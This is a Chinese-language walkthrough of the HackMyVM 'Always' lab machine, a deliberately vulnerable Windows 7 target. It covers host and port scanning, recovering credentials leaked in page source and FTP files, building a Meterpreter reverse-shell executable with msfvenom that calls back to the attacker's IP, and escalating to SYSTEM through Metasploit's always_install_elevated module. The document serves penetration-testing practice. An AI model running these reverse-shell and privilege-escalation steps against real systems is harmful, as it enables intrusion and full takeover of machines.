当前位置: 首页 > article >正文

HackMyVM-Always靶机的测试报告

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:win7(192.168.101.246)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、ftp(登录ftp)、msfvenom(生成反连木马)、msfconsole(漏洞利用)

测试网址:http://192.168.101.246:8080

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Always

二、测试目的

基于渗透测试流程测试该Windows靶机,拿到密码信息,提权到system权限拿到两个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

可以看到靶机IP:192.168.101.246

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.246

可以看到开启了很多端口:21、135、139、445、3389、5357、8080

目录扫描

gobuster dir -u http://192.168.101.246:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

扫到一个主页和后台

查看后台主页的源码,使用前端验证,而且直接将用户名和密码暴露了

admin/adminpass123

2、Getshell

登录后台,进去是一串base64加密的密文

ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=

解密得到:ftpuser:KeepGoingBro!!!

这是ftp的用户名和密码,ftpuser是用户名:

ftpuser/KeepGoingBro!!!

登录ftp,有一个robots.txt文件可以下载

ftp 192.168.101.246
get robots.txt

查看robots.txt文件,发现一个新的文件地址:/admins-secret-pagexxx.html

cat robots.txt

进入该网页,是一个备份笔记

提示了always用户和密码,解密得到如下密码:

always/YouCantFindMe.!.!

根据靶机开启了3389端口,尝试远程登录

但是没always用户登录失败

看到ftpuser用户,尝试登录,也不让远程登录

这里没找到其他方法,直接登录靶机上传shell吧(近源攻击)

Msfvenom生成反弹shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.127 lport=6000 -f exe -o test.exe

开启监听,并在靶机执行exe文件

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.101.127
set lport 6000
run

3、提权

使用msf插件自动寻找Windows提权方法

bg
use multi/recon/local_exploit_suggester
set session 1
run

查找到了14个可利用的exp

使用第一个模块即可提权system权限

use exploit/windows/local/always_install_elevated
set lhost 192.168.101.127
set session 1
run

进入cmd,在Always用户的桌面找到

user.txt:HMV{You_Found_Me!}

cd c:/Users/Always/Desktop
type user.txt

在administrator用户的桌面找到

root.txt:HMV{White_Flag_Raised}

cd c:/Users/Administrator/Desktop
dir
type root.txt

四、结论

靶机开放了很多服务,并且没做防护,可以很轻松拿到密码,并且得到system权限。


http://www.kler.cn/a/469951.html

相关文章:

  • Android Telephony | 协议测试针对 test SIM attach network 的问题解决(3GPP TS 36523-1-i60)
  • react 封装一个类函数使用方法
  • SSL,TLS协议分析
  • 海外云服务器能用来做什么?
  • macOS 安装 python3.11
  • 计算机网络--路由表的更新
  • Linux文件系统权限
  • 2024 高级爬虫笔记(五)mysql、MongoDB、reids
  • 【Java数据结构】二叉树
  • 内网穿透的应用-自托管文件分享系统PicoShare搭建流程与远程共享实战教程
  • 大数据-240 离线数仓 - 广告业务 测试 ADS层数据加载 DataX数据导出到 MySQL
  • LInux单机安装Redis
  • 现代前端框架
  • html+css+js网页设计 体育 中满体育4个页面
  • html 元素中的data-v-xxxxxx 是什么?为什么有的元素有?有的没有?
  • 并行通信和串行通信
  • JVM调优,参数在哪里设置的?
  • STM32F4适配WINUSB2.0
  • Tableau数据可视化与仪表盘搭建-数据可视化原理
  • 从单点 Redis 到 1 主 2 从 3 哨兵的架构演进之路
  • Spring AMQP ----消息转换器
  • C#编程中dynamic类型
  • BOOST 在计算机视觉方面的应用及具体代码分析(二)
  • 计算机网络--根据IP地址和路由表计算下一跳
  • 海外招聘丨 弗拉瑞克商学院—博士研究员:智能家居技术业务和能源管理中的数据分析和人工智能
  • 大疆无人机炸机,视频文件打不开怎么办